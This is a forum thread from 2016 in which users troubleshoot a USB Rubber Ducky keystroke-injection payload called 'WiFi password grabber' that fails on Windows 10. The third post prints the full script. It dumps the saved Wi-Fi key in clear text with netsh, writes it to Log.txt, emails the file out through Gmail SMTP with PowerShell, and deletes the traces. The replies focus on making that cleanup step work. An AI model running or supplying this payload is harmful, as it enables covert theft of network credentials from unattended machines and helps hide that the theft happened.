futsec Posted September 8, 2016 Posted September 8, 2016 I'm new to the ducky and was just trying a sample script. This one - https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---WiFi-password-grabber For the most part the script works well expect the last part of the script isn't executing. It exits powershell, but never deletes the Log.txt file and never exits the command prompt. In fact it looks like it never attempts to do it. This is on Windows 10. Anyone else experience this? I tried searching the forum, but didn't see a similar post. Thanks! REM --> Delete Log.txt and exit STRING del Log.txt & exit ENTER I also tried REM --> Delete Log.txt and exit STRING del Log.txt ENTER STRING exit ENTER Quote
p1ph Posted September 10, 2016 Posted September 10, 2016 Hey futsec, When you plug in the duck to a computer it needs to install drivers for the HID, which is the Duck. so, You should try the DELAY command to the top of your script, and else where like so: DELAY 3000 REM --> Delete Log.txt and exit DELAY 150 STRING del Log.txt ENTER DELAY 150 STRING exit ENTER You need to use the delay command in between some commands so the computer has enough time to process the information before you spam it with key strokes again. Quote
futsec Posted September 10, 2016 Author Posted September 10, 2016 p1ph - thanks for the response. The text I posted is only the bottom part of the script. I am using the complete script that is in the link in my original post. Here is the complete script with the delay in place. REM Title: WiFi password grabber REM Author: Siem REM Version: 3 REM Description: Saves the SSID, Network type, Authentication and the password to Log.txt and emails the contents of Log.txt from a gmail account. DELAY 3000 REM --> Minimize all windows WINDOWS d REM --> Open cmd WINDOWS r DELAY 500 STRING cmd ENTER DELAY 1000 REM --> Getting SSID STRING cd "%USERPROFILE%\Desktop" & for /f "tokens=2 delims=: " %A in ('netsh wlan show interface ^| findstr "SSID" ^| findstr /v "BSSID"') do set A=%A ENTER REM --> Creating A.txt STRING netsh wlan show profiles %A% key=clear | findstr /c:"Network type" /c:"Authentication" /c:"Key Content" | findstr /v "broadcast" | findstr /v "Radio">>A.txt ENTER REM --> Get network type STRING for /f "tokens=3 delims=: " %A in ('findstr "Network type" A.txt') do set B=%A ENTER REM --> Get authentication STRING for /f "tokens=2 delims=: " %A in ('findstr "Authentication" A.txt') do set C=%A ENTER REM --> Get password STRING for /f "tokens=3 delims=: " %A in ('findstr "Key Content" A.txt') do set D=%A ENTER REM --> Delete A.txt STRING del A.txt ENTER REM --> Create Log.txt STRING echo SSID: %A%>>Log.txt & echo Network type: %B%>>Log.txt & echo Authentication: %C%>>Log.txt & echo Password: %D%>>Log.txt ENTER REM --> Mail Log.txt STRING powershell ENTER STRING $SMTPServer = 'smtp.gmail.com' ENTER STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) ENTER STRING $SMTPInfo.EnableSsl = $true ENTER STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('ACCOUNT@gmail.com', 'PASSWORD') ENTER STRING $ReportEmail = New-Object System.Net.Mail.MailMessage ENTER STRING $ReportEmail.From = 'ACCOUNT@gmail.com' ENTER STRING $ReportEmail.To.Add('RECEIVER@gmail.com') ENTER STRING $ReportEmail.Subject = 'WiFi key grabber' ENTER STRING $ReportEmail.Body = (Get-Content Log.txt | out-string) ENTER STRING $SMTPInfo.Send($ReportEmail) ENTER STRING exit ENTER REM --> Delete Log.txt and exit STRING del Log.txt & exit ENTER Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.